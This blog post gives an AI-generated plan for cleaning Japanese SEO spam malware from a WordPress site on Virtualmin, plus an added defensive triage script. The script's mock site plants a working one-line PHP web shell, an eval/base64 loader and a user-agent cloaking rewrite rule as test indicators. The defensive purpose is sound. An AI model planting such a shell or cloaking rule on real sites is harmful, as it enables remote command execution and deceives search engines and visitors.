This is an example of how cleaning a site can be accomplished using artificial intelligence. Following is the prompt I used with Gemini (not showing the actual domain name of the site) after I used the Sucuri site to determine the site contained malware:
One of the sites on my server started using a lot of bandwidth and upon checking with Sucuri it shows as being infected by malware:
https://sitecheck.sucuri.net/results/domain.com
The malware it appears to be infected with is described here:
https://labs.sucuri.net/signatures/sitecheck/spam-seo/?japanese.2
The customer said she hired someone to boost her SEO and keywords and drive more traffic to her site and all, but after working with him a while she couldn’t understand his English so she stopped working with him.
The site is not listed anywhere (like Google or in Firefox) as infected or dangerous.
Can you give me a plan in the form of a descriptive article to clean her WordPress site in Virtualmin on Debian 12 of this?
The raw output (with the exception of the actual domain name) follows.
Gemini Raw Output
It sounds like your client’s site has fallen victim to a Japanese Keyword Hack. This is a common and aggressive SEO spam attack where thousands of pages of auto-generated Japanese text (often promoting counterfeit goods or gambling) are injected into the site. Because these pages are designed to be seen by search engine bots rather than human users (cloaking), they often go unnoticed until bandwidth spikes or search rankings plummet.
Since the site is hosted on Virtualmin (Debian 12), you have full root access, which makes the cleanup much more effective than on shared hosting.
Here is a comprehensive plan to sanitize the WordPress installation and harden the server.
Cleaning the Japanese SEO Spam Malware: A Step-by-Step Guide
1. Pre-Cleanup Preparation
Before touching the code, ensure you have a “safety net.”
- Full Backup: Use Virtualmin’s backup feature to create a snapshot of the virtual server (Files + Database).
- Go Offline: Install a “Maintenance Mode” plugin or use an `.htaccess` rule to redirect traffic. This prevents the malware from potentially executing further scripts while you work.
2. Identify the Entry Point
The “SEO specialist” the client hired likely had admin credentials or FTP access.
- Check Users: In the WordPress Dashboard, look for unrecognized Administrator accounts.
- Virtualmin Logs: Check the access logs at `/var/log/virtualmin/domain.com_access_log`. Look for suspicious `POST` requests to unknown `.php` files or unusual activity from foreign IP addresses around the time the “specialist” was active.
3. Core WordPress Reinstallation
Malware often modifies core WordPress files. The cleanest way to fix this is to replace them entirely.
- Connect via SSH or use the Virtualmin File Manager.
- Delete the `wp-admin` and `wp-includes` directories.
- Delete all `.php` files in the root directory (except `wp-config.php`).
- Download a fresh copy of WordPress from WordPress.org and upload the new `wp-admin`, `wp-includes`, and root `.php` files.
4. Sanitizing the wp-content Folder
This is where the malware usually hides.
- Plugins: Delete the entire `/wp-content/plugins/` directory and reinstall them from the WordPress repository. Do not “update” them; delete and replace.
- Themes: If using a stock theme, delete and reinstall. If it’s a custom theme, manually inspect the `functions.php` and header/footer files for base64 encoded strings or `eval()` functions.
- Uploads: Check `/wp-content/uploads/`. There should be no .php files here. Use the terminal to find them:

```bash
find /home/linuxusername/public_html/wp-content/uploads -name "*.php"
```

If any appear, delete them immediately.
5. Cleaning the .htaccess and index.php
Japanese SEO spam heavily relies on the .htaccess file to rewrite URLs for the fake pages.
- Open your `.htaccess` file. If you see complex rules redirecting to strange files, delete them. Revert to the standard WordPress .htaccess.
- Check the root `index.php`. It should only contain the standard WordPress bootstrap code.
6. Database Sanitization
The “Japanese keywords” are often stored in the wp_posts table or injected into the wp_options table.
- Log into phpMyAdmin or use the Virtualmin database tool.
- Search the `wp_posts` table for Japanese characters or titles related to the spam keywords.
- Check the `wp_options` table for `siteurl` or `home` changes.
7. Virtualmin/Debian Level Hardening
Since you are on Debian 12, take advantage of system-level security:
- Update System: Ensure Debian is patched: `apt update && apt upgrade`.
- Change All Credentials: Change the Virtualmin user password, the MySQL database password (update `wp-config.php` accordingly), and all WordPress admin passwords.
- Permissions: Ensure files are owned by the Virtualmin user and permissions are set correctly (644 for files, 755 for directories).

```bash
chown -R linuxusername:linuxusername /home/linuxusername/public_html
```
8. Handling Search Engine Results
Even after the site is clean, Google may still have thousands of Japanese pages indexed.
- Google Search Console: Register the site immediately.
- Sitemap: Generate a new, clean XML sitemap and submit it.
- Removals Tool: Use the “Removals” tool in Search Console to temporarily hide the spam URLs.
- 404 Errors: The spam URLs will now lead to 404 pages. This is good. Eventually, Google will see the pages are gone and drop them from the index.
9. Ongoing Protection
- Install a Security Plugin: Wordfence or Sucuri’s plugin can provide a firewall and scheduled scanning.
- Disable File Editing: Add `define( 'DISALLOW_FILE_EDIT', true );` to your `wp-config.php` to prevent even admins from editing code through the dashboard.
- Fail2Ban: Ensure Fail2Ban is active in Virtualmin to block brute-force attempts on SSH and WordPress logins.
Summary: You are essentially performing a “surgical replacement.” By replacing the core, plugins, and themes while auditing the uploads and .htaccess, you remove the malware’s ability to run. The rest is simply convincing Google that the “new” site is the legitimate one.
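The plan above leaves the actual looking to the reader. The script below is an added example of mine, not part of the post and not produced by Gemini, that turns the checks from steps 2, 4 and 5 into a read-only sweep you can run before deleting anything: PHP files under `wp-content/uploads`, theme and plugin files calling common obfuscation functions (`eval`, `base64_decode`, `gzinflate`, `str_rot13`, `create_function`), `.htaccess` rewrite and `ErrorDocument` directives that are not part of the standard WordPress block, and `POST` requests in the access log aimed at PHP files WordPress does not normally accept posts on. It assumes the layout the plan uses (docroot under `/home/<user>/public_html`, Apache combined log format as Virtualmin writes it); the mock docroot and log lines it builds with `make_sample_site` are constructed for demonstration, with one planted indicator per check, including a user-agent-conditional rewrite of the kind used to cloak spam pages from human visitors.

```bash
#!/bin/sh
# wp_triage.sh: read-only indicator sweep for the cleanup steps above.
# Added example, not part of the original post. Assumes the page's layout
# (docroot under /home/<user>/public_html, combined-format Apache access log);
# the sample site and log built by make_sample_site are constructed.
set -u

# Step 4 (Uploads): PHP under wp-content/uploads is never legitimate.
php_in_uploads() {                      # $1 = docroot
  find "$1/wp-content/uploads" -type f -name '*.php' 2>/dev/null | sort || :
}

# Step 4 (Themes/Plugins): files calling common obfuscation/loader functions.
suspicious_php() {                      # $1 = docroot
  grep -rlE --include='*.php' \
    -e 'eval\(|base64_decode\(|gzinflate\(|str_rot13\(|create_function\(' \
    "$1/wp-content/themes" "$1/wp-content/plugins" 2>/dev/null | sort || :
}

# Step 5 (.htaccess): Rewrite*/ErrorDocument lines outside the standard
# WordPress block (which only references index.php and REQUEST_FILENAME).
# A RewriteCond on HTTP_USER_AGENT is the cloaking signature.
htaccess_findings() {                   # $1 = path to .htaccess
  grep -nE '^[[:space:]]*(RewriteRule|RewriteCond|ErrorDocument)' "$1" 2>/dev/null \
    | grep -vE 'index\\?\.php|REQUEST_FILENAME' || :
}

# Step 2 (logs): POSTs to PHP files other than those WordPress itself
# accepts POSTs on. Prints "count ip path", most frequent first.
unknown_php_posts() {                   # stdin = access log (combined format)
  awk '$6 == "\"POST" && $7 ~ /\.php/ &&
       $7 !~ /^\/(wp-login\.php|xmlrpc\.php|wp-cron\.php|wp-admin\/admin-ajax\.php)/ {
         split($7, u, "?"); c[$1 " " u[1]]++ }
       END { for (k in c) print c[k], k }' | sort -rn || :
}

# Constructed mock docroot with one planted indicator per check, plus a
# constructed access log, so the sweep can be exercised offline.
make_sample_site() {                    # $1 = empty directory
  d="$1"
  mkdir -p "$d/wp-content/uploads/2024/11" \
           "$d/wp-content/themes/twentytwentyfour" "$d/wp-content/plugins/akismet"
  printf '<?php echo "clean plugin";\n' > "$d/wp-content/plugins/akismet/akismet.php"
  printf '<?php eval(base64_decode("cGhwaW5mbygpOw=="));\n' \
    > "$d/wp-content/themes/twentytwentyfour/functions.php"
  printf '<?php @system($_POST["c"]);\n' > "$d/wp-content/uploads/2024/11/wp-class.php"
  cat > "$d/.htaccess" <<'EOF'
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^([a-z0-9-]+)\.html$ wp-content/uploads/2024/11/wp-class.php?p=$1 [L]
EOF
  cat > "$d/access_log" <<'EOF'
203.0.113.5 - - [12/Mar/2025:10:14:01 +0000] "POST /wp-content/uploads/2024/11/wp-class.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2025:10:14:09 +0000] "POST /wp-content/uploads/2024/11/wp-class.php?p=1 HTTP/1.1" 200 734 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2025:10:15:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2025:10:16:00 +0000] "GET /zyxel-12345.html HTTP/1.1" 200 9012 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
198.51.100.7 - - [12/Mar/2025:10:17:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
EOF
}

# Stand-alone demo against the mock site; on a live server source the file
# and call the functions with the real docroot and log instead.
if [ "${1:-}" = "--demo" ]; then
  D=$(mktemp -d); make_sample_site "$D"
  echo "== PHP in uploads";       php_in_uploads "$D"
  echo "== obfuscated PHP";       suspicious_php "$D"
  echo "== .htaccess findings";   htaccess_findings "$D/.htaccess"
  echo "== POSTs to unknown PHP"; unknown_php_posts < "$D/access_log"
  rm -rf "$D"
fi
```

Run `sh wp_triage.sh --demo` to see it flag the planted indicators; on the real server, `. ./wp_triage.sh` and then, for example, `unknown_php_posts < /var/log/virtualmin/domain.com_access_log` or `htaccess_findings /home/linuxusername/public_html/.htaccess`. Nothing here deletes or modifies files, so it is safe to run before the backup in step 1 is even taken, and worth re-running after the rebuild to confirm the indicators are gone. The hit list from the log is also what tells you which uploaded file was the actual backdoor and which IPs to look up in the other virtual servers’ logs. The database search in step 6 is deliberately left to SQL in phpMyAdmin; grepping a dump for Japanese text depends on the server locale and is less reliable than a `LIKE` query on `post_title` and `post_name`.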